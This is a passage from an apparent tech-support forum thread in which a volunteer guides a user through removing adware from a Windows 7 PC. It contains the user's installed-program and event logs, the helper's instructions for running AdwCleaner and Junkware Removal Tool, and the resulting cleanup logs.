"{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}" = Microsoft Visual C++ 2005 Redistributable (x64)
"{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}" = Bonjour
"{787136D2-F0F8-4625-AA3F-72D7795AC842}" = Apple Mobile Device Support
"{81E20D41-C277-4526-934D-F2380AF91B78}" = iCloud
"{886e7ed9-3a61-449c-8152-4192f681466b}" = Native Instruments Skanner XT
"{8C775E70-A791-4DA8-BCC3-6AB7136F4484}" = Visual Studio 2012 x64 Redistributables
"{8E34682C-8118-31F1-BC4C-98CD9675E1C2}" = Microsoft .NET Framework 4 Extended
"{95120000-00B9-0409-1000-0000000FF1CE}" = Microsoft Application Error Reporting
"{9C5A08BF-BB99-4998-81BD-F6CC32483B34}" = Microsoft Corporation
"{9D3BAEFB-5DDD-43D4-8BB2-D9989521F003}" = Native Instruments Razor
"{A4DDB2AB-ECCD-4C3A-8633-77D5A1A0E542}" = Network64
"{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}" = Microsoft Visual C++ 2005 Redistributable (x64)
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision" = NVIDIA 3D Vision Driver 311.06
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel" = NVIDIA Control Panel 311.06
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver" = NVIDIA Graphics Driver 311.06
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB" = NVIDIA 3D Vision Controller Driver 280.19
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update" = NVIDIA Update 1.11.3
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver" = NVIDIA HD Audio Driver 1.2.23.3
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_installer" = NVIDIA Install Application
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NVIDIA.Update" = NVIDIA Update Components
"{B8BA155B-1E75-405F-9CB4-8A99615D09DC}" = iTunes
"{CE52672C-A0E9-4450-8875-88A221D5CD50}" = Windows Live ID Sign-in Assistant
"{D954C6C2-544B-4091-A47F-11E77162883E}" = Microsoft Security Client
"{E5083D57-D93F-404C-A91F-1C50D67C2BEB}" = HP Officejet 4500 G510g-m
"{E5D0E503-AAA5-CE4D-34BA-6D24FEC1BEFC}" = AMD Catalyst Install Manager
"{E9EA5F38-6299-45A1-9D23-F21729A19357}" = Native Instruments Reaktor 5
"{F585058F-3348-4640-9742-B5797416A1E3}" = AVG 2014
"{F5B09CFD-F0B2-36AF-8DF4-1DF6B63FC7B4}" = Microsoft .NET Framework 4 Client Profile
"{F842F8B0-6942-4930-821F-543E976B2C66}" = MSVCRT110_amd64
"94C2CBCEB09487955736DC003D83210FA0D9F021" = Windows Driver Package - Realtek (RTL8167) Net  (06/10/2011 7.046.0610.2011)
"AVG" = AVG 2014
"Belkin USB Print and Storage Center" = Belkin USB Print and Storage Center
"Blender" = Blender
"HP Document Manager" = HP Document Manager 2.0
"HP Imaging Device Functions" = HP Imaging Device Functions 13.0
"HP Smart Web Printing" = HP Smart Web Printing 4.5
"HP Solution Center & Imaging Support Tools" = HP Solution Center 13.0
"HPExtendedCapabilities" = HP Customer Participation Program 13.0
"HPOCR" = OCR Software by I.R.I.S. 13.0
"McAfee Security Scan" = McAfee Security Scan Plus
"Microsoft .NET Framework 4 Client Profile" = Microsoft .NET Framework 4 Client Profile
"Microsoft .NET Framework 4 Extended" = Microsoft .NET Framework 4 Extended
"Microsoft Security Client" = Microsoft Security Essentials
"Pen Tablet Driver" = Wacom
"Shop for HP Supplies" = Shop for HP Supplies
"UDK-20d600fe-2caf-4677-828a-2fab27292871" = Unreal Development Kit: 2013-02
"UVI Workstation x64_is1" = UVI Workstation x64 2.0.7
"Wacom WebTabletPlugin for Internet Explorer and Netscape" = WebTablet FB Plugin 64 bit
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{007F778D-F15C-4EAB-AE92-071D21FAF632}" = Adobe Photoshop Elements 9
"{00C5F4F4-62F9-40D7-8000-AD8A9CD0C669}" = Microsoft Games for Windows - LIVE Redistributable
"{048298C9-A4D3-490B-9FF9-AB023A9238F3}" = Steam
"{08D2E121-7F6A-43EB-97FD-629B44903403}" = Microsoft_VC90_CRT_x86
"{0F367CA3-3B2F-43F9-A44A-25A8EE69E45D}" = Scan
"{1057511B-F8FE-4230-9ED3-AB949A57EE4A}" = Windows Live PIMT Platform
"{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}" = Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005
"{14DC0059-00F1-4F62-BD1A-AB23CD51A95E}" = Adobe AIR
"{175F0111-2968-4935-8F70-33108C6A4DE3}" = MarketResearch
"{18455581-E099-4BA8-BC6B-F34B2F06600C}" = Google Toolbar for Internet Explorer
"{185F9795-9663-4F13-9EF9-307A282ADB5A}" = ph
"{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
"{1F7FB68F-52F6-46A3-B42F-38CE46295AE5}" = Nero MediaHub 10
"{20D4A895-748C-4D88-871C-FDB1695B0169}" = Platform
"{20E7BC40-33F6-4A81-9D52-B58349326206}" = Download and Sa
"{21A2F5EE-1DC5-488A-BE7E-E526F8C61488}" = DeviceDiscovery
"{2318C2B1-4965-11d4-9B18-009027A5CD4F}" = Google Toolbar for Internet Explorer
"{237CCB62-8454-43E3-B158-3ACD0134852E}" = High-Definition Video Playback 10
"{2436F2A8-4B7E-4B6C-AE4E-604C84AA6A4F}" = Nero Core Components 10
"{28379381-B56A-43e1-B505-3098D82B1C30}" = 4500G510gm_Software_Min
"{29315CEC-E6CE-4394-84DC-6F862E8D9A52}" = Windows Live UX Platform
"{297DCADA-86A1-4A42-8A13-66B7D7A09FD2}" = WeatherBug
"{2A075BB4-E976-4278-BF3F-E5C6945D84C0}" = bl
"{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}" = Microsoft XNA Framework Redistributable 4.0
"{2C9EE786-1DDB-4C98-8FA4-B1B9B5A66B77}" = Microsoft Games for Windows - LIVE
"{2D416A80-0BB1-4D8B-B770-7BE8F53D5937}" = Windows Live UX Platform Language Pack
"{2EEA7AA4-C203-4b90-A34F-19FB7EF1C81C}" = BufferChm
"{30FD541D-3C9D-41C4-B240-A994EE4E0231}" = Adobe Audition CS6
"{329411A0-19F3-4740-874F-17400B126F27}" = Nero Vision 10 Help (CHM)
"{40F55150-F43D-4C9F-9A00-1A0A6F1EB7F0}" = Movie Maker
"{418BAAD1-754D-48B4-B078-46EF4F25AF42}" = Google Drive
"{433EACD8-4747-4A6A-826A-FFA9F39B0D40}" = Elements 9 Organizer
"{43CDF946-F5D9-4292-B006-BA0D92013021}" = WebReg
"{440B915A-0C85-45DB-92AE-75AE14704A64}" = Fax
"{46316411-80D8-4F68-8118-696E05FCE199}" = Windows Live Essentials
"{4817D846-700B-474E-A31B-80892B3E92E3}" = Adobe After Effects CS6
"{4A70EF07-7F88-4434-BB61-D1DE8AE93DD4}" = SolutionCenter
"{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}" = Skype™ 6.1
"{4F9A382F-4478-4036-905C-F77DF2EA0370}" = Windows Live SOXE
"{4FA8F084-C42F-45E1-B7E5-E0C8A1083DC5}" = Windows Live SOXE Definitions
"{51C7AD07-C3F6-4635-8E8A-231306D810FE}" = Cisco LEAP Module
"{523B2B1B-D8DB-4B41-90FF-C4D799E2758A}" = Nero ControlCenter 10 Help (CHM)
"{5CC4C963-F772-4766-BFF2-DE551E205EE9}" = Photo Common
"{5E21B617-F52E-BB10-92F9-C8AB2C799A8A}" = Adobe Download Assistant
"{6037B8AD-7D5B-4D50-9BCA-A586C44EEF34}" = Ace of Spades
"{60A1253C-2D51-4166-95C2-52E9CF4F8D64}" = Photo Gallery
"{612C34C7-5E90-47D8-9B5C-0F717DD82726}" = swMSM
"{63AA3EAB-23BB-48B2-9AD0-44F878075604}" = Nero 10 Menu TemplatePack Basic
"{63FF21C9-A810-464F-B60A-3111747B1A6D}" = GPBaseService2
"{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}" = Cisco EAP-FAST Module
"{64DF7404-9D46-44AF-AFA1-A2F8D5648C2D}" = Windows Live Photo Common
"{65BB0407-4CC8-4DC7-952E-3EEFDF05602A}" = Nero Update
"{68A10D12-0D0F-4212-BDE6-D87FAD32A8FA}" = SmartWebPrinting
"{6B2FFB21-AC88-45C3-9A7D-4BB3E744EC91}" = HPSSupply
"{6BBA26E9-AB03-4FE7-831A-3535584CA002}" = Toolbox
"{6DFB899F-17A2-48F0-A533-ED8D6866CF38}" = Nero Control Center 10
"{7059BDA7-E1DB-442C-B7A1-6144596720A4}" = HP Update
"{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}" = Microsoft Visual C++ 2005 Redistributable
"{74EB3499-8B95-4B5C-96EB-7B342F3FD0C6}" = Adobe Photoshop CS6
"{76EE8FE7-1957-4C51-9074-4930A8CFB1AF}" = Windows Live Installer
"{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}" = Apple Software Update
"{837b34e3-7c30-493c-8f6a-2b0f04e2912c}" = Microsoft Visual C++ 2005 Redistributable
"{86D4B82A-ABED-442A-BE86-96357B70F4FE}" = Ask Toolbar
"{8D8024F1-2945-49A5-9B78-5AB7B11D7942}_is1" = Auslogics Registry Cleaner
"{8DD46C6A-0056-4FEC-B70A-28BB16A1F11F}" = MSVCRT
"{8E14DDC8-EA60-4E18-B3E3-1937104D5BDA}" = MSVCRT110
"{8FE96B14-E1F9-47BF-8BA1-A81467CD259B}_is1" = Yawcam 0.3.8
"{90DFD61B-8224-00C6-3D69-A983B60A394E}" = Bamboo Dock
"{92A51949-EE4C-466D-AAF0-99E74A49A63F}" = DocMgr
"{92D58719-BBC1-4CC3-A08B-56C9E884CC2C}" = Microsoft_VC80_CRT_x86
"{94358C28-335B-4E43-BC4E-C59576BAB653}" = ASPCA Reminder by We-Care.com v4.0.16.1
"{94D7C8B5-E61B-431F-BFF6-08E0B2BD609C}" = PowerInbox
"{96D06FDD-6AF4-4309-BC1B-1C9588B0575E}" = Dead Space™ 2
"{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}" = Visual Studio 2012 x86 Redistributables
"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
"{9A4297F3-2A51-4ED9-92CA-4BCB8380947E}" = Nero Vision 10
"{9B2E55F8-5BA8-4A45-9682-ACB6F2CC0DA5}" = Photo Gallery
"{9B362566-EC1B-4700-BB9C-EC661BDE2175}" = DocProc
"{9BE518E6-ECC6-35A9-88E4-87755C07200F}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
"{9C049499-055C-4a0c-A916-1D12314F45EB}" = REALTEK Wireless LAN Driver and Utility
"{9E549410-E417-4672-96E1-607E061AE69D}" = Nero VisionXtra Trial
"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper
"{AAC5D43E-816D-4C2D-8E51-55FFF35BE301}" = Apple Application Support
"{AC1BFC52-016B-4F2A-8604-C9F1A0181F4C}_is1" = DREADOUT Demo
"{AC76BA86-7AD7-1033-7B44-AB0000000001}" = Adobe Reader XI (11.0.02)
"{AE8705FB-E13C-40A9-8A2D-68D6733FBFC2}" = Status
"{AF37176A-78CA-545B-34EF-8B6A21514DD1}" = Adobe Help Manager
"{B3BC9DB1-0B0A-48B0-B86B-EA77CAA7F800}" = Microsoft Corporation
"{B4092C6D-E886-4CB2-BA68-FE5A88D31DE6}_is1" = Spybot - Search & Destroy
"{BA73469B-D8C7-4FE3-B33C-1340D09F0709}" = Windows Live Communications Platform
"{BB285C9F-C821-4770-8970-56C4AB52C87E}" = Skype Click to Call
"{BD5669B5-49FF-4490-B956-E9D7CB9B0ADC}" = Adobe Flash Professional CS6
"{BD7204BA-DD64-499E-9B55-6A282CDF4FA4}" = Destinations
"{BE0D4271-69C9-4f28-AD9B-BB33D126A30E}" = 4500G510gm
"{BFEAAE77-BD7F-4534-B286-9C5CB4697EB1}" = PDF Settings CS6
"{C0C31BCC-56FB-42a7-8766-D29E1BD74C7C}" = Python 2.7.3
"{C43326F5-F135-4551-8270-7F7ABA0462E1}" = HPProductAssistant
"{ce085a78-074e-4823-8dc1-8a721b94b76d}" = Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005
"{D1A19B02-817E-4296-A45B-07853FD74D57}" = Microsoft_VC80_MFC_x86
"{D71BC54E-A4E6-4E06-866C-FD6EE16EA187}" = Movie Maker
"{D92BBB52-82FF-42ED-8A3C-4E062F944AB7}" = Microsoft_VC80_MFCLOC_x86
"{DC0A5F99-FD66-433F-9D3A-05DCBA64BE42}" = TrayApp
"{DF0B357C-5874-47D0-81E7-79AA890B0CE0}" = 4500_G510gm_Help
"{DF6A13C0-77DF-41FE-BD05-6D5201EB0CE7}_is1" = Auslogics Disk Defrag
"{E09C4DB7-630C-4F06-A631-8EA7239923AF}" = D3DX10
"{E2AE009D-37E5-4724-A6B8-0ED6A6BA4F68}" = Elements STI Installer
"{E5F05232-96B6-4552-A480-785A60A94B21}" = System Requirements Lab CYRI
"{EC8282AB-48DD-91D2-7387-01CD6E100A5D}" = Adobe Photoshop.com Inspiration Browser
"{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}" = Cisco PEAP Module
"{F03117FA-9270-46B0-9666-0B4BC2CDEBF5}" = Visual C++ Redistributables
"{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}" = Microsoft SQL Server 2005 Compact Edition [ENU]
"{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}" = Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219
"{F1D34C1C-9C2A-4932-BE14-7B641A4D53E9}" = NETGEAR WNA1100 wireless USB 2.0 driver
"{F467862A-D9CA-47ED-8D81-B4B3C9399272}" = Nero MediaHub 10 Help (CHM)
"{F5CB822F-B365-43D1-BCC0-4FDA1A2017A7}" = Nero 10 Movie ThemePack Basic
"{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}" = Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005
"{F96D619D-99D6-4C9C-A393-0CD22DE1CA66}_is1" = Ezvid
"{FCDBEA60-79F0-4FAE-BBA8-55A26C609A49}" = Visual Studio 2008 x64 Redistributables
"Acoustica Mixcraft 6" = Acoustica Mixcraft 6
"Adobe AIR" = Adobe AIR
"Adobe Flash Player ActiveX" = Adobe Flash Player 13 ActiveX
"Adobe Flash Player Plugin" = Adobe Flash Player 13 Plugin
"Adobe Photoshop Elements 9" = Adobe Photoshop Elements 9
"Adobe Shockwave Player" = Adobe Shockwave Player 12.1
"Anti-phishing Domain Advisor" = Anti-phishing Domain Advisor
"ASIO4ALL" = ASIO4ALL
"Audacity_is1" = Audacity 2.0.2
"AVG Secure Search" = AVG Security Toolbar
"Bamboo Dock" = Bamboo Dock
"Belkin Setup and Router Monitor_is1" = Belkin Setup and Router Monitor
"blekkotb_026" = blekko search bar
"Camel Audio CamelCrusher64" = Camel Audio CamelCrusher64
"chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1" = Adobe Help Manager
"Cheat Engine 6.2_is1" = Cheat Engine 6.2
"com.adobe.downloadassistant.AdobeDownloadAssistant" = Adobe Download Assistant
"DAEMON Tools Lite" = DAEMON Tools Lite
"daHornet VSTi V1.34_is1" = daHornet Version 1.34
"Deckadance" = Deckadance
"Desura" = Desura
"FL Studio 10" = FL Studio 10
"Fraps" = Fraps (remove only)
"Giant Savings" = Giant Savings
"GoldWave v5.67" = GoldWave v5.67
"Google Chrome" = Google Chrome
"HotspotShield" = Hotspot Shield 2.87
"IL Download Manager" = IL Download Manager
"IL Shared Libraries" = IL Shared Libraries
"InfoAtoms" = InfoAtoms [Uninstall]
"Inkscape" = Inkscape 0.48.2
"InstallShield_{20D4A895-748C-4D88-871C-FDB1695B0169}" = VIA Platform Device Manager
"InstallShield_{F03117FA-9270-46B0-9666-0B4BC2CDEBF5}" = Visual C++ Redistributables
"Mozilla Firefox 29.0.1 (x86 en-US)" = Mozilla Firefox 29.0.1 (x86 en-US)
"MozillaMaintenanceService" = Mozilla Maintenance Service
"Native Instruments Massive" = Native Instruments Massive
"Native Instruments Razor" = Native Instruments Razor
"Native Instruments Reaktor 5" = Native Instruments Reaktor 5
"Native Instruments Service Center" = Native Instruments Service Center
"Native Instruments Skanner XT" = Native Instruments Skanner XT
"Notepad++" = Notepad++
"NVIDIA StereoUSB Driver" = NVIDIA 3D Vision Controller Driver
"NVIDIAStereo" = NVIDIA Stereoscopic 3D Driver
"pcsx2-r5875" = PCSX2 - Playstation 2 Emulator
"PhotoshopdotcomInspirationBrowser.4C35C4D325D350FE0114230CBADCA2DDD0AC8D25.1" = Adobe Photoshop.com Inspiration Browser
"PhotoStage" = PhotoStage Slideshow Producer
"PowerISO" = PowerISO
"PureLeads" = PureLeads
"Razer Game Booster_is1" = Razer Game Booster
"rgcAudio z3ta Plus v1.40" = rgcAudio z3ta Plus v1.40
"RPG Maker VX RTP_is1" = RPG Maker VX RTP
"SearchProtect" = Search Protect
"SecondLifeViewer" = SecondLifeViewer (remove only)
"Sonic Charge Synplant VST" = Sonic Charge Synplant VST
"Steam App 105600" = Terraria
"Steam App 50300" = Spec Ops: The Line
"Steam App 7670" = BioShock
"Steam App 8850" = BioShock 2
"Synthesia" = Synthesia
"Unity" = Unity
"Video Mover_is1" = Video Mover
"vReveal" = vReveal
"Wacom WebTabletPlugin for Internet Explorer and Netscape" = WebTablet FB Plugin 32 bit
"wacomid-desktop-launcher.DCFD4B89A63EE70BC162777F06D4B93B6397AEC7.1" = Bamboo Dock
"WavePad" = WavePad Sound Editor
"WinLiveSuite" = Windows Live Essentials
"ZOTAC FireStorm" = ZOTAC FireStorm
 
========== HKEY_USERS Uninstall List ==========
 
[HKEY_USERS\S-1-5-21-1681504733-1289828258-2380439542-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"GameMaker-Studio11" = GameMaker-Studio 1.1
"UnityWebPlayer" = Unity Web Player
"uTorrent" = µTorrent
 
========== Last 20 Event Log Errors ==========
 
[ Application Events ]
Error - 6/6/2014 1:52:53 PM | Computer Name = COCHRAN-PC | Source = Application Error | ID = 1000
Description = Faulting application name: hsssrv.exe, version: 2.87.0.0, time stamp:
 0x511aa668  Faulting module name: netprofm.dll_unloaded, version: 0.0.0.0, time stamp:
 0x4a5bda75  Exception code: 0xc0000005  Fault offset: 0x6eec2505  Faulting process id:
 0xaa8  Faulting application start time: 0x01cf81a6c75d1de9  Faulting application path:
 C:\Program Files (x86)\Hotspot Shield\HssWPR\hsssrv.exe  Faulting module path: netprofm.dll
Report
 Id: 61cf16b1-eda3-11e3-8c87-1078d23545a3
 
Error - 6/6/2014 5:53:05 PM | Computer Name = COCHRAN-PC | Source = Application Hang | ID = 1002
Description = The program RegCurePro.exe version 3.2.3.0 stopped interacting with
 Windows and was closed. To see if more information about the problem is available,
 check the problem history in the Action Center control panel.    Process ID: 2d30    Start
 Time: 01cf81d14c25036e    Termination Time: 11    Application Path: C:\Program Files (x86)\ParetoLogic\RegCure
 Pro\RegCurePro.exe    Report Id:   
 
Error - 6/6/2014 5:59:59 PM | Computer Name = COCHRAN-PC | Source = Application Hang | ID = 1002
Description = The program SpybotSD.exe version 1.6.2.46 stopped interacting with
 Windows and was closed. To see if more information about the problem is available,
 check the problem history in the Action Center control panel.    Process ID: 2bc8    Start
 Time: 01cf81d213c9148d    Termination Time: 7    Application Path: C:\Program Files (x86)\Spybot
 - Search & Destroy\SpybotSD.exe    Report Id:   
 
Error - 6/6/2014 6:00:00 PM | Computer Name = COCHRAN-PC | Source = Application Hang | ID = 1002
Description = The program Weather.exe version 6.8.0.8 stopped interacting with Windows
 and was closed. To see if more information about the problem is available, check
 the problem history in the Action Center control panel.    Process ID: 6b4    Start Time:
 01cf81a8cae82368    Termination Time: 31    Application Path: C:\Program Files (x86)\AWS\WeatherBug\Weather.exe

Report
 Id:   
 
Error - 6/6/2014 6:31:22 PM | Computer Name = COCHRAN-PC | Source = WinMgmt | ID = 10
Description =
 
Error - 6/6/2014 6:34:40 PM | Computer Name = COCHRAN-PC | Source = Sendori | ID = 99
Description = TV ERRORObject reference not set to an instance of an object.
 
Error - 6/7/2014 2:38:31 AM | Computer Name = COCHRAN-PC | Source = PlsvcV2 | ID = 99
Description = In the enable methodObject reference not set to an instance of an
object.
 
Error - 6/7/2014 2:43:46 AM | Computer Name = COCHRAN-PC | Source = Sendori | ID = 99
Description = TV ERRORThe remote name could not be resolved: 'pureleadstv.searchtreat.com'
 
Error - 6/7/2014 3:03:43 AM | Computer Name = COCHRAN-PC | Source = Sendori | ID = 99
Description = TV ERRORThe remote name could not be resolved: 'pureleadstv.searchtreat.com'
 
Error - 6/7/2014 4:08:43 AM | Computer Name = COCHRAN-PC | Source = Sendori | ID = 99
Description = TV ERRORThe remote name could not be resolved: 'pureleadstv.searchtreat.com'
 
[ System Events ]
Error - 6/6/2014 3:33:04 PM | Computer Name = COCHRAN-PC | Source = Service Control Manager | ID = 7031
Description = The Hotspot Shield Service service terminated unexpectedly.  It has
 done this 1 time(s).  The following corrective action will be taken in 0 milliseconds:
 Restart the service.
 
Error - 6/6/2014 4:48:42 PM | Computer Name = COCHRAN-PC | Source = Service Control Manager | ID = 7031
Description = The PlsvcV2 service terminated unexpectedly.  It has done this 1 time(s).
  The following corrective action will be taken in 60000 milliseconds: Restart the
 service.
 
Error - 6/6/2014 6:31:20 PM | Computer Name = COCHRAN-PC | Source = Service Control Manager | ID = 7024
Description = The AVGIDSAgent service terminated with service-specific error %%-536753636.
 
Error - 6/6/2014 6:33:43 PM | Computer Name = COCHRAN-PC | Source = Service Control Manager | ID = 7038
Description = The nvUpdatusService service was unable to log on as .\UpdatusUser
 with the currently configured password due to the following error:   %%1330    To ensure
 that the service is configured properly, use the Services snap-in in Microsoft
Management Console (MMC).
 
Error - 6/6/2014 6:33:43 PM | Computer Name = COCHRAN-PC | Source = Service Control Manager | ID = 7000
Description = The NVIDIA Update Service Daemon service failed to start due to the
 following error:   %%1069
 
Error - 6/6/2014 10:34:40 PM | Computer Name = COCHRAN-PC | Source = Service Control Manager | ID = 7031
Description = The PlsvcV2 service terminated unexpectedly.  It has done this 1 time(s).
  The following corrective action will be taken in 60000 milliseconds: Restart the
 service.
 
Error - 6/7/2014 2:36:15 AM | Computer Name = COCHRAN-PC | Source = Service Control Manager | ID = 7031
Description = The PlsvcV2 service terminated unexpectedly.  It has done this 1 time(s).
  The following corrective action will be taken in 60000 milliseconds: Restart the
 service.
 
Error - 6/7/2014 6:38:32 AM | Computer Name = COCHRAN-PC | Source = Service Control Manager | ID = 7031
Description = The PlsvcV2 service terminated unexpectedly.  It has done this 1 time(s).
  The following corrective action will be taken in 60000 milliseconds: Restart the
 service.
 
Error - 6/7/2014 10:40:07 AM | Computer Name = COCHRAN-PC | Source = Service Control Manager | ID = 7031
Description = The PlsvcV2 service terminated unexpectedly.  It has done this 1 time(s).
  The following corrective action will be taken in 60000 milliseconds: Restart the
 service.
 
Error - 6/7/2014 2:43:11 PM | Computer Name = COCHRAN-PC | Source = Service Control Manager | ID = 7031
Description = The PlsvcV2 service terminated unexpectedly.  It has done this 1 time(s).
  The following corrective action will be taken in 60000 milliseconds: Restart the
 service.
 
 
< End of report >
 


  • 0

#4
zep516

zep516

    Trusted Helper

  • Malware Removal
  • 6,793 posts
Sorry for delay never got notification.

Lets start with these tools, remember download to desktop, and run as "Administrator"

Please download AdwCleaner by Xplode onto your Desktop.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click the Scan button and wait for the process to complete.
  • Click the Report button and the report will open in Notepad.
  • NOTE: If you get an error message, it means that nothing was found. Exit from AdwCleaner.
  • Click on the Clean button follow the prompts.
  • A log file will automatically open after the scan has finished and the PC has rebooted.
  • Please post the content of that log file with your next answer.
  • You can find the log file at C:\AdwCleaner
  • Next

    thisisujrt.gif Please download Junkware Removal Tool to your Desktop.

    Please close your security software to avoid potential conflicts.
    Run the tool by double-clicking it. If you are using Windows Vista or 7, right-mouse click it and select Run as administrator.
    The tool will open and start scanning your system.
    Please be patient as this can take a while to complete, depending on your system's specifications.
    On completion, a log (JRT.txt) is saved to your Desktop and will automatically open.
    Please post the contents of JRT.txt into your reply.


    Post the adwCleaner [SO].TXT
    Post the JRT.TXT Log

    Thanks
    Joe :)

  • 0

#5
zep516

zep516

    Trusted Helper

  • Malware Removal
  • 6,793 posts
Are you still with me AllenCrown1 ?
  • 0

#6
AllenCrown1

AllenCrown1

    New Member

  • Topic Starter
  • Member
  • Pip
  • 5 posts

yes, I am, My internet has been down. I shall get your information in the hour


  • 0

#7
AllenCrown1

AllenCrown1

    New Member

  • Topic Starter
  • Member
  • Pip
  • 5 posts

Here is the JUNK REMOVAL TOOL TXT

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.1.4 (04.06.2014:1)
OS: Windows 7 Home Premium x64
Ran by COCHRAN on Thu 06/12/2014 at 22:11:21.29
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




~~~ Services

Successfully stopped: [Service] cltmngsvc
Successfully deleted: [Service] cltmngsvc



~~~ Registry Values

Successfully deleted: [Registry Value] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Toolbar\\{636a1cf4-2af8-462e-ba54-5f0d75ad6eef}



~~~ Registry Keys

Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\installer\upgradecodes\f928123a039649549966d4c29d35b1c9
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{636a1cf4-2af8-462e-ba54-5f0d75ad6eef}
Successfully deleted: [Registry Key] HKEY_CLASSES_ROOT\CLSID\{636a1cf4-2af8-462e-ba54-5f0d75ad6eef}
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{636a1cf4-2af8-462e-ba54-5f0d75ad6eef}
Successfully deleted: [Registry Key] HKEY_CLASSES_ROOT\CLSID\{16C8C46E-C811-4977-BF0A-B5CC1FA78D95}
Successfully deleted: [Registry Key] "hkey_current_user\software\microsoft\internet explorer\low rights\elevationpolicy\{a5aa24ea-11b8-4113-95ae-9ed71deaf12a}"



~~~ Files



~~~ Folders

Successfully deleted: [Folder] "C:\Windows\syswow64\ai_recyclebin"



~~~ FireFox

Successfully deleted: [File] C:\user.js
Emptied folder: C:\Users\COCHRAN\AppData\Roaming\mozilla\firefox\profiles\5afpu397.default\minidumps [269 files]



~~~ Chrome

Successfully deleted: [Folder] C:\Users\COCHRAN\appdata\local\Google\Chrome\User Data\Default\Extensions\ippkomaaonokjnfjoikaemidanojkfmm
Successfully deleted: [Folder] C:\Users\COCHRAN\appdata\local\Google\Chrome\User Data\Default\Extensions\ndkhncnongaclekkbelchmeafffimifj



~~~ Event Viewer Logs were cleared





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Thu 06/12/2014 at 22:22:47.42
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 

AND HERE IS THE OTHER ONE

 

# AdwCleaner v3.212 - Report created 12/06/2014 at 22:04:18
# Updated 05/06/2014 by Xplode
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : COCHRAN - COCHRAN-PC
# Running from : C:\Users\COCHRAN\Desktop\adwcleaner_3.212.exe
# Option : Clean

***** [ Services ] *****

[#] Service Deleted : 70e6ca8c
[x] Not Deleted : CltMngSvc
Service Deleted : hshld
Service Deleted : HssSrv
[#] Service Deleted : hsstrayservice
Service Deleted : hsswd
Service Deleted : vToolbarUpdater18.1.0

***** [ Files / Folders ] *****

Folder Deleted : C:\ProgramData\Anti-phishing Domain Advisor
Folder Deleted : C:\ProgramData\AVG Secure Search
Folder Deleted : C:\ProgramData\blekko toolbars
Folder Deleted : C:\ProgramData\Download and Sa
Folder Deleted : C:\ProgramData\hotspot shield
Folder Deleted : C:\ProgramData\ParetoLogic
Folder Deleted : C:\ProgramData\Premium
Folder Deleted : C:\ProgramData\RightClick
Folder Deleted : C:\ProgramData\WeCareReminder
Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Download and Sa
Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\hotspot shield
Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\optimizer pro v3.2
Folder Deleted : C:\Program Files (x86)\AVG Secure Search
Folder Deleted : C:\Program Files (x86)\Giant Savings
Folder Deleted : C:\Program Files (x86)\hotspot shield
Folder Deleted : C:\Program Files (x86)\InfoAtoms
Folder Deleted : C:\Program Files (x86)\Optimizer Pro
Folder Deleted : C:\Program Files (x86)\SearchProtect
Folder Deleted : C:\Program Files (x86)\Speedial
Folder Deleted : C:\Program Files (x86)\Common Files\AVG Secure Search
Folder Deleted : C:\Windows\installer\{86d4b82a-abed-442a-be86-96357b70f4fe}
Folder Deleted : C:\Windows\SysWOW64\hotspot shield
